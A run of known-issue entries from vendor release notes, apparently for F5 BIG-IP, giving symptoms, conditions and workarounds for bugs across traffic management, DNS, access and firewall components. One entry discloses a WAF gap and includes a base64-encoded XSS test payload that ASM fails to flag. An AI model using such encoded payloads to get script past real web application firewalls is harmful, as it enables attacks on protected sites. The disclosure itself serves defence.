Links to More Info: BT1854461

Component: Protocol Inspection

Symptoms:
When deleting an IPS policy, the GUI reports an error "Unable to delete file", but the file is deleted.

Conditions:
After deleting the IM package from the "Available to install", followed by saving the save sys config and reboot the BIG-IP device. Unable to delete the IM package from the "available to deploy" and which leads to the GUI error

Impact:
No functionality impact, only the GUI error, which is cosmetic.

Workaround:
None


1854353-3 : Users with Resource admin role are not able to save the UCS.

Links to More Info: BT1854353

Component: TMOS

Symptoms:
When creating a UCS file, an error occurs:

Data Input Error: Invalid partition ID request, partition does not exist ([All])
Error during config save.
Unexpected Error: UCS saving process failed.

Conditions:
-- Creating a UCS file
-- The user role that initiated the UCS save is Resource Admin

Impact:
Users in a Resource Admin role are unable to save a UCS file.

Workaround:
Other admin type roles are able to save the UCS file.


1854137-1 : Verified accept and pool reselect-tries may cause TCP proxy to core

Links to More Info: BT1854137

Component: Local Traffic Manager

Symptoms:
Tmm crashes and restarts

Conditions:
-- TCP Virtual server with verified-accept enabled
-- Some form of asynchronous persistance
-- Flaky pool members at precisely the right time in the verified accept sequence.
-- Delayed ACK on serverside, thus allowing the pool member to be taken down and the sweeper to expire the server-side flow.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1849829-2 : Deprecation of dnssec-lookaside and dnssec-enable Directives in latest BIND release

Links to More Info: BT1849829

Component: SSL Orchestrator

Symptoms:
The directives dnssec-lookaside and dnssec-enable previously used in the named.conf configuration file are now deprecated and no longer supported by latest BIND versions.
If these directives are present in the named.conf file:
Error messages appear in DNS server logs when starting the named service.
The DNS server fails to start or exhibit unexpected behaviour due to the presence of unsupported directives.

Conditions:
1. SSL Orchestrator L3 explicit topology
2. Check bind version with below command
# named -v
BIND 9.18.28 (Extended Support Version) <id:f77fadb>

This version of BIND is not supporting mentioned dns tokens.

Impact:
DNS queries will fail if the BIND configuration (named.conf) contains unsupported directives (e.g., dnssec-lookaside, dnssec-enable).
As a result:
The DNS resolver will fail to process queries.
This will cause traffic relying on name resolution to fail, leading to potential disruptions in services that depend on DNS.

Workaround:
1. Remove the deprecated directives dnssec-lookaside and dnssec-enable from the BIND configuration file located at: /var/named/config/named.conf
2. After making the changes, restart the named service to apply the updated configuration: bigstart restart named


1849585-2 : A correctly encoded long Authorization param triggers 'illegal base64 value' vaiolation

Links to More Info: BT1849585

Component: Application Security Manager

Symptoms:
A correctly encoded base64 string that is over 8192 triggers 'illegal base64 value' violation

Conditions:
Authorization param is longer than 8192 chars

Impact:
False positive with 'illegal base64 value'

Workaround:
Disable the violation


1849265-4 : A VCMP guest may not exit hardware syncookie mode

Links to More Info: BT1849265

Component: TMOS

Symptoms:
On a VCMP guest, if a virtual server enters hardware syncookie mode due to a syn flood, and the virtual server is passing a significant amount of valid traffic, it may not exit syncooke mode.

Conditions:
-- VCMP guest
-- Hardware syncookie mode

Impact:
Syncookies may continue to be issued even though the attack has stopped.

Workaround:
Remove traffic from the virtual server until syncookies deactivates.
This can be accomplished by using cli transaction to alter the first virtual server and create an identical new virtual server.
Example:
Assume my_vs1 is the existing virtual server listening on port 80
tmsh
create /cli transaction
delete ltm virtual my_vs1
create ltm virtual my_vs2 destination 10.10.10.16:80 pool pool1 profiles add { fastL4 http } source-address-translation { type automap }
submit /cli transaction

This will, delete the first virtual server but existing TCP connections will be maintained. And then the new virtual server will be created which will accept new transaction. Since syncookie are enabled per virtual server, this new virtual server will not be in hardware syncookie mode.


1849029 : Debug TMM crashes in FIPS/CC mode

Links to More Info: BT1849029

Component: Local Traffic Manager

Symptoms:
A TMM in debug mode crash occurs in FIPS/CC mode when using ClientSSL or ServerSSL profile.

Conditions:
-- Debug tmm is running
-- FIPS/CC mode enabled

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Switch to non debug tmm.


1848577-2 : VCMP guest stats are not visible on vCMP host GUI nor CLI

Links to More Info: BT1848577

Component: Application Visibility and Reporting

Symptoms:
- Issuing the command 'tmsh show analytics vcmp report view-by guest measures { average-guest-cpu-usage }' returns 'No data available'
- Graphs on 'Statistics ›› Analytics : vCMP : CPU Usage' says "There is no data to display either due to the lack of relevant traffic or due to the settings of the filter." even after the vCMP guest has been running for more than 10 minutes.

Conditions:
- vCMP host running v17.1.x
- The following tables are missing when issuing the command tmctl -f /var/tmstat/blade/vcmp_union_tables' from the vCMP host:
  vcmp_tmm_stat_union
  vcmp_pva_stat_union
  vcmp_proc_pid_stat_union
  vcmp_host_info_stat_union

Impact:
No stats (eg. CPU, Network, Disk Usage) can be seen for the vCMP guests when looking from the vCMP host.

Workaround:
Run this Bash one-liner from the vCMP host:

 bigstart restart merged ; sleep 600 ; bigstart restart avrd ; sleep 600 ; bigstart restart avrd merged ; sleep 600 ;

Thereafter, check the tables and analytics with these commands:

 tmctl -w$COLUMNS -f /var/tmstat/blade/vcmp_union_tables
 tmsh show analytics vcmp report view-by guest measures { average-guest-cpu-usage }


1848565-2 : Error during updating device details: Internal error (Json parser error)

Links to More Info: BT1848565

Component: Access Policy Manager

Symptoms:
Mdmsyncmanager reports errors for every query from the MDM DB:

Error in /var/log/apm:

notice mdmsyncmgr[24645]: 019dffff:5: (null)::00000000: {} /Common/mdm: Start querying devices from https://mysite.com/TrafficGateway/TrafficRoutingService/ResourceAccess/ComplianceRetrievalService

err mdmsyncmgr[24645]: 019dffff:3: (null)::00000000: {} /Common/mdm: Error during updating device details: Internal error (Json parser error)

Conditions:
MDM is configured.

Impact:
Errors are logged by mdmsyncmanager due to JSON errors. Other causes or impacts are unknown, this does not seem to impact traffic.

Workaround:
None


1828005-1 : Syslog message does not carry log level when destination is remote

Links to More Info: BT1828005

Component: TMOS

Symptoms:
When a syslog include filter includes a local log source, the log level filter is ignored for the remote syslog server.

Conditions:
Add an include filter with source,filter,destination and configure source as local:

include "
filter f_remote_loghost {
facility(local0) and level(info..emerg);
};
destination d_remote_loghost {
udp(\"<ip>\" port(514));
};
log {
source(local);
filter(f_remote_loghost);
destination(d_remote_loghost);
};
"

Impact:
Log level is not displayed. This makes it difficult to understand the priority of the logs on the remote system.

Workaround:
Include s_syslog_pipe as source in the include filter

Steps to apply:
1. Login to tmsh and execute the command to edit the config : tmsh edit /sys syslog all-properties
2.Add the below include config:
include "
filter f_remote_loghost {
facility(local0) and level(info..emerg);
};
destination d_remote_loghost {
udp(\"<ip>\" port(514) );
};
log {
source(s_syslog_pipe);
filter(f_remote_loghost );
destination(d_remote_loghost);
};
"
3.Save the file and restart syslog with the command: bigstart restart syslog-ng
4. This will reflect the logs with priority in the remote server


1827821-2 : isBase64 params and headers not blocking Attack Signatures

Links to More Info: BT1827821

Component: Application Security Manager

Symptoms:
The parameter value in GET requests are considered as base64 even when the calculated score is below 'base64_max_score'

Params and headers configured as "Base64Decode=required" do not detect base64 encoded attack signatures.

Conditions:
-- Create a parameter named "param" configured as "Base64Decode=required".
-- Send Request to URL /?param=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

Impact:
No Violations Detected, while the parameter included an attack signature (PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== is the base64 encoded value of <script>alert(1)</script>)

Workaround:
None


1826273-2 : Mysql client uses TLS1.1 when connecting to mysql server running 5.7

Links to More Info: BT1826273

Component: TMOS

Symptoms:
Connection is always negotiated with TLS1.1

Conditions:
The mqsql client in BIG-IP's version is 5.1.47, which hardcode's the TLS version used to connect with mysql server versions which supports TLS1.1. TLS1.1 is not a supported version in mysql server 8.0.0.4 onwards and client successfully connects to those servers with TLS 1.2.

Impact:
Client should negotiate with TLS1.2

Workaround:
None


1825357-2 : Possible tmm crash or traffic loss after making vlan interface changes with an empty trunk

Links to More Info: BT1825357

Component: Local Traffic Manager

Symptoms:
Tmm crashes and generates a core file.

or

Network traffic via a trunk does not work.

Conditions:
Platform i2600, i2800, i4600, i4800, r2800, r4800 or VADC

All trunk members are removed from a trunk attached to a vlan.
Then, the trunk is removed from one or more vlans.
Then, the trunk is deleted.
This could result in a tmm crash.

or

A trunk with no members is added to a vlan.
Then, one or more members are added to the trunk.
This will result in traffic on that vlan not being being sent over that trunk.

Impact:
Traffic disrupted while tmm restarts
or
Traffic is not sent out via the trunk

Workaround:
Do not remove and a trunk with no members from a vlan.
It will be necessary to restart tmm to correct this situation.

Do not add a trunk with no members to a vlan.
If a trunk with no members was added to the vlan, the issue can be corrected by removing the trunk from the vlan, ensuring that there are members in the trunk and adding it back to the vlan.


1825253-1 : Enhance the log message for better readability User session was terminated due to IP address change during session

Links to More Info: BT1825253

Component: Access Policy Manager

Symptoms:
Users experience an unexpected termination of their session when the IP address changes during the active session. So the log message was improved for better readability.

Conditions:
This issue is observed when there is a network change, such as:

-- Switching from WIFI to mobile data.
-- VPN IP address change.
-- IP address reassignment due to DHCP lease renewal.

Impact:
Users are abruptly logged out, resulting in lost session data or work in progress. This can cause delays and interruptions in workflows, especially in environments that require continuous access.

Workaround:
None


1825249-1 : read_until: end of file

Links to More Info: BT1825249

Component: Access Policy Manager

Symptoms:
The Configuration Utility displays an error: "read_until: end of file."

Conditions:
-- Viewing a virtual server in the GUI
-- The Virtual Server does not have an HTTP profile attached

Impact:
The GUI prints a "read_until: end of file" error

Workaround:
None


1824985-3 : In rare cases the Nitrox hardware compression queue may stop servicing requests.

Links to More Info: BT1824985

Component: Local Traffic Manager

Symptoms:
In rare cases, the Nitrox hardware may stop servicing requests.

When this issue occurs the tmctl compress table shows a high number of cur_enqueued entries and the number of requests handled in software (zlib) will be growing.

Conditions:
-- Nitrox compression hardware.
-- HTTP compression in use.

Impact:
Some connections may fail, and higher than expected CPU usage will be observed since requests will be handled in software.

Workaround:
Remove traffic from the device, or disable compression until the queues are completely drained.


1824965-1 : Implement iRule support to fetch SNI from SSL, HTTP and QUIC traffic

Component: Traffic Classification Engine

Symptoms:
You can not use an iRule to look up the SNI/hostname from SSL, HTTP, and QUIC traffic.

Conditions:
You need to look up the SNI/hostname in an iRule

Impact:
You are unable to look up the SNI or hostname.

Workaround:
None


1824521-2 : GUI: VLAN names are not populated while creating the vlan-group under Network Quick configuration

Links to More Info: BT1824521

Component: Local Traffic Manager

Symptoms:
VLAN names are not present as a dropdown option in the Quick configuration GUI.

Conditions:
On a tenant device, navigate to Network -> Quick Configuration -> Create -> VLAN Group Properties -> Tag

Impact:
We may be unable to configure the vlangroup from the Quick configuration GUI on the tenant

Workaround:
VLAN groups can be configured through the following path:
Network > VLANs > VLAN Groups > Create

This interface provides a list of available VLANs from which you can select members to add to the VLAN group.

You can also configure VLAN Groups via the CLI.


1824113-3 : GTM iRule : [active_members <poolname>] command ignores any status effects applied by a parent.

Links to More Info: BT1824113

Component: Global Traffic Manager (DNS)

Symptoms:
Disabling a pool or virtual server that is referenced by a pool member affects how pool <poolname> selects a response, but [active_members <poolname>] still returns a value that ignores these status effects.

Conditions:
-- GTM pool
-- An iRule that checks the available_members of the pool is greater than zero before selecting the pool
-- Disable the pool

The pool is still selected for client queries to the wideIP

Logs show that the available_members is equal to the number of pool members, even though the pool is disabled.

Impact:
Unable to manage availability by disabling the pool.

Workaround:
None


1824037-2 : IPS profile using engine after free

Links to More Info: BT1824037

Component: Protocol Inspection

Symptoms:
crashes while passing IPS traffic.

Conditions:
-- IPS license applied to BIG-IP
-- IPS profile attached to a virtual server

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1824009-3 : When DNS64 is enabled, resolver cache passes SERVFAIL responses to the client

Links to More Info: BT1824009

Component: Global Traffic Manager (DNS)

Symptoms:
When a DNS profile is configured with both Secondary DNS64 (with a prefix) and a resolver cache, any response from an authoritative server to a AAAA query with RCODEs such as SERVFAIL or SERVFAIL(Timeout due to no response from external resolver), FORMERR, NOTIMP, REFUSED, YXRRSET, NXRRSET, YXDOMAIN , NOTAUTH, or NOTZONE will be cached as SERVFAIL and sent directly to the client.

Conditions:
- DNS64 enabled in the DNS profile
- DNS resolver cache configured

Impact:
SERVFAIL response is directly send back to the client

Workaround:
None


1821353-2 : Error on long wildcard configuration

Links to More Info: BT1821353

Component: Application Security Manager

Symptoms:
When a wildcard url is configured with a size above 1023, the system can't start up.

Conditions:
The wildcard URL length exceed 1023 bytes.

Impact:
Bd goes into restart loop.

Workaround:
Reduce the length of the wildcard URL.


1821089-4 : DNS64 and resolver cache may not function together as expected

Links to More Info: BT1821089

Component: Global Traffic Manager (DNS)

Symptoms:
Wirth DNS64 enabled and also a resolver cache, the first AAAA query for a name that has only an A record and no AAAA record is correctly translated to the configured prefix. However, subsequent queries return only NOERROR to the client instead of the AAAA response.

Conditions:
-- DNS64 enabled with resolver cache
-- AAAA queries

Impact:
Subsequent queries return NOERROR and no record responses

Workaround:
None


1820833-1 : General Database Error when creating a new profile

Links to More Info: BT1820833

Component: Bot Defense

Symptoms:
When creating a custom bot defense profile, after clicking Finished an error occurs: "General Database Error"

Conditions:
-- Creating a custom mobile bot defense profile
-- The profile enables mobile endpoints
-- The parent profile has been modified

Impact:
The profile is not created and a General Database Error is reported.

Workaround:
None


1820573-2 : PEM Traffic Classification signatures are classifying the youtube videos with quic enabled as udp.quic instead of udp.quic.youtube.youtube_video.youtube_video_abr on windows using the latest chrome web browser

Links to More Info: BT1820573

Component: Traffic Classification Engine

Symptoms:
Classification is not happening properly

Conditions:
YouTube video playing on the latest version of Chrome web browser

Impact:
Classification is incorrect

Workaround:
None


1820489-2 : Rule list order changes when modifying a rule using Filer Active Rules List

Links to More Info: BT1820489

Component: Advanced Firewall Manager

Symptoms:
Firewall Policy rule ID changes when Modifying a rule using "Filer Active Rules List" and commit the changes.

Conditions:
- AFM licensed and provisioned.
- Create a rule-list with 4-5 rules in it.
- Create a Policy and add rule-list under it.
- Now Filer any of 2 Active Rules from rule List and then the Rule ID order changes, Now do any modification on filtered rules and commit the changes.
- Now remove the filter and observe the Rule ID changes for all the rules once after commit the changes.

Impact:
May lead to a change in the rule order and priority.

Workaround:
Remove the filter before committing the changes.


1819857-1 : [APM][PRP] Session variables are not able to access within Oauth Client agent intermittently

Links to More Info: BT1819857

Component: Access Policy Manager

Symptoms:
The request object which contains custom session variables which are filled through iRule and variable assign agent are empty in oauth redirect urls

At the time of oauth Request object creation i.e from mcp to tmm oauth_request_item_table is not getting populated in all tmm instances and every time issue identified in a single tmm instance.

Conditions:
-- BIG-IP APM as OAuth Client, inside Per-Request-Policy.
-- Some custom session variables are filled thru variable assign agent and irules.

custom session variables are used in oauth request in auth redirect and token redirect params.

Impact:
Not able to perform oauth

Workaround:
None


1819721-3 : LSN failed events details are ambiguous

Links to More Info: BT1819721

Component: Carrier-Grade NAT

Symptoms:
When an LSN translation failure occurs, the logs show ""NAPT - Translation failed" which does not give enough details to narrow down potential root causes.

Conditions:
A LSN translation failure occurs

Impact:
Narrowing down potential root causes of the failure may be difficult.

Workaround:
None


1818949-2 : [APM] BIG-IP as OAuth AS sending invalid grant error when refresh token expired.

Links to More Info: BT1818949

Component: Access Policy Manager

Symptoms:
As per RFC states that, the provided authorization grant (e.g., authorization code, resource owner credentials) or refresh token is invalid, expired, revoked, does not match the redirection URI used in the authorization request, or was issued to another client then should send a 400 Bad Request status code and a error json response
{"error": "invalid_grant", ...}

currently BIG-IP sending as {"error": "access_denied", ...}
with 400 status code.

Conditions:
OAuth configured.
using the refresh token to get the access token, when refresh token is expired. (ex: using postman)

Impact:
Returns Invalid error

Workaround:
None


1813717-4 : Some blocked requests are not logged when filtered by response status codes

Links to More Info: BT1813717

Component: Application Security Manager

Symptoms:
Blocked requests with status code N/A are not logged when filtered by response code

Conditions:
-- Using a custom logging profile with request type set to all requests or blocked requests, logic operation AND and Response status code set to ONLY

Impact:
Missing logs of some blocked requests

Workaround:
None


1813505-2 : Snmpd may seg fault on systems with large amounts of virtual memory

Links to More Info: BT1813505

Component: TMOS

Symptoms:
Snmpd cores

Conditions:
* systems with large amounts of virtual memory (e.g. 3.5 TB)
* attempt to access dot3StatsTable

Impact:
Snmp unavailable when snmpd restarts

Workaround:
Avoid using dot3StatsTable.


1788193-3 : [MCP] Request logging should only be allowed with supported protocol profiles

Links to More Info: BT1788193

Component: TMOS

Symptoms:
Request Logging can only log HTTP requests. Other protocol profiles are not supported. Configuring request logging on a MQTT virtual server will cause tmm to crash.

Conditions:
Request logging profile is configured on MQTT virtual server

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1788065-1 : The rule cannot be deleted because it is in use by a rule

Links to More Info: BT1788065

Component: Local Traffic Manager

Symptoms:
When trying to delete two iRules in same transaction with one is calling the proc defined in another the deletion fails with below error.

mcpd[6467]: 01070265:3: The rule (/Common/Shared/library_irule) cannot be deleted because it is in use by a rule (/Common/Shared/example_irule).

The rules are
- "library_irule" containing procedure do_nothing
- "example_irule" that calls proc do_nothing
- Virtual "my_vs1" that attaches "example_irule"

Conditions:
-- Two iRules exist.
-- One iRule calls a procedure defined in the other iRule.
-- You attempt to delete both iRules at the same time.

Impact:
Unable to delete the iRule.

Workaround:
Try to delete the iRules in different transactions.


1787981-3 : Memory leak in ips_pcb_cache

Links to More Info: BT1787981

Component: Protocol Inspection

Symptoms:
The ips_pcb_cache stat keeps increasing while the system is passing traffic.

Conditions:
- IPS licensed and provisioned.
- Port missing from service or
- Port configured for service that does not match traffic.

Impact:
Increased memory usage of ips_pcb_cache and may lead to tmm crash. Traffic disrupted while tmm restarts.

Workaround:
Add TCP port (e.g., port 443) to the respective service on the IPS profile. For example, with a virtual-server that is configured with port 443, the port should be added to HTTP service if it terminates SSL (e.g., has client-ssl profile), otherwise the SSL service.


1787909-2 : Sys db variable security.configpassword value is changed to not null when ng_export is interrupted

Links to More Info: BT1787909

Component: Access Policy Manager

Symptoms:
AAA authentication starts failing after exporting/importing an access policy.

Conditions:
When 'ng_export <access policy name> <new access policy name>' is interrupted, for example by pressing CTRL-C.

Impact:
A change to the AAA password does not take effect and AAA authentication fails.

Workaround:
You are affected by this issue if you expect security.configpassword to be null but the output of 'tmsh list sys db security.configpassword' is non-null.

You can run the following command to set it back to null.
tmsh modify /sys db security.configpassword value "<null>"


1787701-2 : [APM]Customization in German contains French language

Links to More Info: BT1787701

Component: Access Policy Manager

Symptoms:
Observe "Change password" contains a French word "Modifier le mot de passe" in Logon Page agent.

Conditions:
Access policy with German language.

Impact:
It is confusing to see a different language in customization.

Workaround:
None


1787517-4 : After upgrade to 17.1.2, expired auth tokens are not deleted from /var/run/pamcache

Links to More Info: BT1787517

Component: TMOS

Symptoms:
REST tokens that are present in /var/run/pamcache on BIG-IP are not deleted after token expiration after the upgrade to version 17.1.2

Potentially noticeable higher memory and CPU use

Conditions:
The system is upgraded to version 17.1.2

Impact:
More memory will be used as /run/pamcache is an in-memory filesystem

Users who have requested 100+ REST tokens may start to receive 400 responses with the message: "user <username> has reached maximum active login tokens".

CPU use may be raised by higher activity of the csyncd process.

Workaround:
Manually remove expired tokens from /var/run/pamcache, and delete them using the /mgmt/shared/authz/tokens API endpoint.

restcurl -X DELETE /shared/authz/tokens
bigstart reastart restjavad


1786805-4 : TMM might crash immediately after going active for the first time after a reboot

Links to More Info: BT1786805

Component: Advanced Firewall Manager

Symptoms:
In some rare scenarios, TMM might crash immediately after going active for the first time after a system reboot.

Conditions:
-- A virtual server has a DoS profile attached.
-- The BIG-IP goes active for the first time after a reboot.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1786457-3 : Protocol Inspection auto update with latest is not working

Links to More Info: BT1786457

Component: Protocol Inspection

Symptoms:
The latest Protocol Inspection IM package is not updating automatically. var/log/pi_hitless_upgrade contains errors and reports

ERROR Error: Exception caught in script. Check logs (/var/log/pi_hitless_upgrade) for details

Conditions:
The IPS is licensed and provisioned.

Impact:
The latest Protocol Inspection IM package is not updated.

Workaround:
Download IM package and install it manually. or click on "Security ›› Protocol Security : Inspection Updates --> Download Package --> From f5.com" and deploy the package manually.


1785385-2 : Intermittent traffic failures when tenant is running BIG-IP v17.1.2 or above and host is on version prior to F5OS-A 1.8.0 or F5OS-C 1.8.0

Links to More Info: BT1785385

Component: Local Traffic Manager

Symptoms:
Intermittent traffic failures for a tenant running BIG-IP v17.1.2 or above.

This often manifests as ICMP monitors failing.

Conditions:
- Tenant running BIG-IP v17.1.2 or above

- Host is one of the following platforms:
-- r5000, r10000, or r12000-series appliance
-- VELOS

- Host is running a version prior to F5OS-A 1.8.0 (rSeries appliance) or F5OS-C 1.8.0 (VELOS chassis)

Impact:
Intermittent traffic disruption. This often manifests as ICMP monitors intermittently failing, but will also impact virtual server traffic and other protocols (e.g. UDP and TCP).

Workaround:
Upgrade F5OS to version 1.8.0 or higher.


1785145-5 : TMM SIGSEGV core due to NULL check is not handled properly in PEM

Links to More Info: BT1785145

Component: Policy Enforcement Manager

Symptoms:
TMM crashes while passing PEM traffic

Conditions:
A PEM profile is enabled on a virtual server.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1784137-1 : Net stp-globals object config-name back to default value upon reboot

Links to More Info: BT1784137

Component: TMOS

Symptoms:
Net stp-globals config-name is reset to default "base mac" in running config, while bigip_base.conf has custom config-name.

This behavior is seen after upgrade to v17.1.1.3 and also when reboot the device when its in v17.

Conditions:
1. Upgrade to v17.1.1.3
2. Reboot the device after changing the config-name in stp-globals.

Impact:
Any changes to net stp-globals will revert to default after reboot.

Workaround:
Configure via startup script after MCPD is found running when the BIG-IP system starts up.


1782137-2 : Management of Wide IPs using the GUI may fail when multiple monitors exist

Links to More Info: BT1782137

Component: Global Traffic Manager (DNS)

Symptoms:
When multiple monitor instances exist, the GUI may become unresponsive when managing Wide IPs.

Conditions:
- GTM configuration contains a sufficiently high number of monitors (> 4000).
- Using the GUI to manage Wide IPs.

Impact:
Configuration changes through the GUI may not be effective. Unable to use the GUI for configuration management.

Workaround:
Use TMSH


1782057-2 : BD crash related to dns lookup

Links to More Info: BT1782057

Component: Application Security Manager

Symptoms:
A bd daemon crash

Conditions:
Related to DNS lookup scenarios

Impact:
ASM traffic disrupted while bd restarts.

Workaround:
None


1778901-2 : PPTP-GRE proxy need tmstat table for connection error analysis

Links to More Info: BT1778901

Component: TMOS

Symptoms:
BIG-IP is unable to create a GRE flow, the connection fails to complete.

Conditions:
This can happen for various reasons, for example:
- CMP communication with another TMM failed.
- Remote end (server) to which one client is already connected, responded with a call-reply containing a call-id which was already used by that server in a previous, existing(still alive) call setup.
- BIG-IP uses translated call-id in the outgoing call request which was already sent to the server and the GRE connection for that setup is still UP, and validation fails when the server accepts a connection.

Impact:
BIG-IP uses a duplicate translated call-id when communicating with the server, but there are no stats in the tmstat table to perform additional troubleshooting of the cause.

Workaround:
None


1772329-3 : Apply Policy failure after upgrading to v16.1.x and later, from earlier version

Links to More Info: BT1772329

Component: Application Security Manager

Symptoms:
An error occurs when applying a policy:

crit perl[21254]: 01310027:2: ASM subsystem error (asm_start,F5::SetActive::Impl::set_active): Setting policy active failed: Failed on insert to DCC.CONTENT_PROFILE_TEMPLATES (DBD::mysql::db do failed: Column 'flg_tolerate' cannot be null)

Conditions:
You had previously imported a policy that was exported from ASM running on v16.1.x or later, to a system running a software version earlier than v16.1.x.

e.g:

You exported a policy from ASM running on v16.1.x, and import it to another ASM running on v15.1.x. Then you upgrade your v15.1.x to higher version.

Impact:
Changes on affected policies are not applied and an error occurs.

Workaround:
Delete graphql content profile with affected policies.


1772317-3 : [APM][SAML SP] sp fails authentication with error "SAML assertion is invalid, error: NameID is missing"

Links to More Info: BT1772317

Component: Access Policy Manager

Symptoms:
SAML authentication fails and following log is seen on BIG-IP as sp: "SAML Agent: /Common/web_auth_act_saml_auth_subsession_ag SAML assertion is invalid, error: NameID is missing, but idp-connector's identity location is set to subject"

Conditions:
-- SAML auth is configured as SP on BIG-IP as part of per-request policy
-- assertion has an encrypted subject "<saml2:Subject><saml2:EncryptedID><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#"...."

Impact:
Authentication fails

Workaround:
Disable "encrypt-subject " in idp config


1759261-4 : OSPF might fail to install external routes after topology change.

Links to More Info: BT1759261

Component: TMOS

Symptoms:
OSPF might fail to install external routes after topology change. Only a subset of routes might be affected.

Conditions:
The problem is more likely to occur with a large number of external type-5 routes being pushed to the BIG-IP system. The problem is time and packet-sequence dependent.

Impact:
Routes are present in OSPF DB but are not in the routing table (RIB).

Workaround:
None


1758961-4 : TMM may core if proxy_common_init errors out due to inappropriate NAT configuration

Links to More Info: BT1758961

Component: Local Traffic Manager

Symptoms:
TMM core is generated and tmm is restarted.

Conditions:
When proxy_common_init() fails due to incorrect configuration of a transparent HTTP proxy in non-standard HTTP and pass-through mode, it only occurs when an ACK and data are received during the connection setup.

Impact:
The core will be generated, and the TMM will be restarted accordingly. Traffic disrupted while TMM restarts.

Workaround:
None


1757585-4 : Unable to install a license on an AWS BIG-IP VE

Links to More Info: BT1757585

Component: TMOS

Symptoms:
- Dossier creation fails with the following errors in the BIG-IP VE LTM log file:

   err chmand[4610]: 012a0003:3: DossierReq exception: VirtDossier Service: Instance identity retrieval from the metadata failed. Check network connectivity to the instance metadata before retrying
   warning get_dossier[10914]: 012a0004:4: hal_request_dossier: request failed
   err get_dossier[10914]: 01170003:3: halGetDossier returned error (1): Dossier generation failed.

- Installing a license from a BIG-IQ returns with an error similar to the following:

  Licensing failed Assignment of regkey pool license {license_pool_name} (License for XXXXX-XXXXX-XXXXX-XXXXX-XXXXXXX) to N.N.N.N ended with INSTALLATION_FAILED status and message: Failed to install license to device N.N.N.N (Not a valid F5 License)

Conditions:
Any of these license removal scenarios trigger the issue on a Single NIC (1nic) AWS BIG-IP VE :

 - Previous license has expired
 - License was revoked using iControl REST command "DELETE /tm/shared/licensing/registration"
 - License was revoked using BIG-IQ

Impact:
- BIG-IP fails to generate a dossier and load a license
- BIG-IQ is unable to re-license the VE

Workaround:
Fix by deleting and resetting IP routing.
1) tmsh delete net route default
2) bigstart restart dhclient

Alternatively manually modify and fix ip route
1) ip route change default via <gateway> dev internal

Where <gateway> is IP address seen in 'ip route' output for 'default'.
Ex: for following, <gateway> is 172.31.0.1

# ip route
default via 172.31.0.1 dev mgmt
default via 172.31.0.1 dev mgmt proto none metric 4096
...


1757537-4 : RCA tmm core with ** SIGSEGV ** inside pick_qos

Links to More Info: BT1757537

Component: Global Traffic Manager (DNS)

Symptoms:
Tmm core inside pick_qos

Conditions:
Race condition of rapid deletion and creation of the same virtual server.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1756897-2 : [APM][PA]Failed to execute 'observe' on 'MutationObserver': parameter 1 is not of type 'Node'

Links to More Info: BT1756897

Component: Access Policy Manager

Symptoms:
Application fails to load with below console error in developer tools.

Uncaught TypeError: Failed to execute 'observe' on 'MutationObserver': parameter 1 is not of type 'Node'.

Conditions:
Portal Access configured.

Impact:
Unable to load application via portal access.

Workaround:
Customized cache-fm-Modern.js ifile workaround is available for this.


1756697-3 : Sec-WebSocket-Extensions header is not stripped when Compression is disabled

Links to More Info: BT1756697

Component: Local Traffic Manager

Symptoms:
When compression mode is 'Typed' and compression is 'disabled' in websocket profile, BIG-IP should strip Sec-WebSocket-Extensions header but it is not happening.

Conditions:
Compression mode is 'Typed' and compression is 'disabled' in websocket profile

Impact:
Sec-WebSocket-Extensions header is seen in server side.

Workaround:
None


1756389-2 : CA certs could get deleted from server.crt after running bigip_add

Links to More Info: BT1756389

Component: Global Traffic Manager (DNS)

Symptoms:
In certain cases, the /config/gtm/server.crt could be deleted after running the bigip_add script.

Conditions:
Running the bigip_add script

Impact:
The iQuery connnection(s) will be impacted until the CA certs are restored.

Workaround:
None


1755413-2 : Fast scp file transfer may not display progress bar

Links to More Info: BT1755413

Component: TMOS

Symptoms:
- Missing progress bar on scp file transfer.

Conditions:
- Includes fix for CVE-2019-6109.

Impact:
The progress bar indicating download progress of scp file transfer is missing in the output.

Workaround:
None


1755113-4 : BD crash with specific JSON schema

Links to More Info: BT1755113

Component: Application Security Manager

Symptoms:
BD crash

Conditions:
Using specific JSON schema in the JSON content profile applied on the ASM policy

Impact:
ASM traffic disrupted while bd restarts.

Workaround:
None


1753489-2 : BFD Commands Missing in ZebOS Config After Reboot or Restart for large configurations

Links to More Info: BT1753489

Component: TMOS

Symptoms:
BFD session commands are missing from the ZebOS configuration after a BIG-IP reboot or bigstart restart.

Conditions:
Occurs consistently with 40+ route domains, intermittently with 20+ route domains, and varies based on configuration size or the number of BFD commands.

Impact:
BFD session configurations are not retained after reboot/restart, causing instability in routing protocols relying on BFD.

Workaround:
None


1752873-2 : [APM][SAML SP] Order of SAML attribute values saml.last.attr.name is reversed

Links to More Info: BT1752873

Component: Access Policy Manager

Symptoms:
After upgrading, the order of SAML attribute values parsed from assertion are stored in reverse order.

Conditions:
-- BIG-IP as SAML SP,
-- Upgrade to 17.1.0

Impact:
The SAML assertion values are parsed in reverse order, which can cause iRules or policies to fail if they expect the values to arrive in a certain order.

Workaround:
None


1715153 : Log message "The connected network is vulnerable to tunnel crack as LocalIP falls under the public IP"

Links to More Info: BT1715153

Component: Access Policy Manager

Symptoms:
You may observe below log in f5report

"The connected network is vulnerable of tunnel crack as LocalIP falls under the public IP"

Conditions:
-- VPN is configured
-- A client connects from a publicly routable address.

Impact:
VPN is established despite the message "The connected network is vulnerable of tunnel crack as LocalIP falls under the public IPs"

Workaround:
None


1711813-4 : Incorrect SOA serial number shown in zxfrd logs during zone transfer

Links to More Info: BT1711813

Component: Global Traffic Manager (DNS)

Symptoms:
SOA serial is incorrect in the zxfrd logging.

zxfrd[4526]: 0153102c:5: IXFR Transfer of zone xyz.net with SOA Serial -1884747279 from 1.1.1.1 succeeded.

Conditions:
After performing the zone transfer, observe the zxfrd logging, where an incorrect serial number is seen once the number exceeds the signed integer limit.

Impact:
Difficult to troubleshoot zone transfer issues via the logs.

Workaround:
None


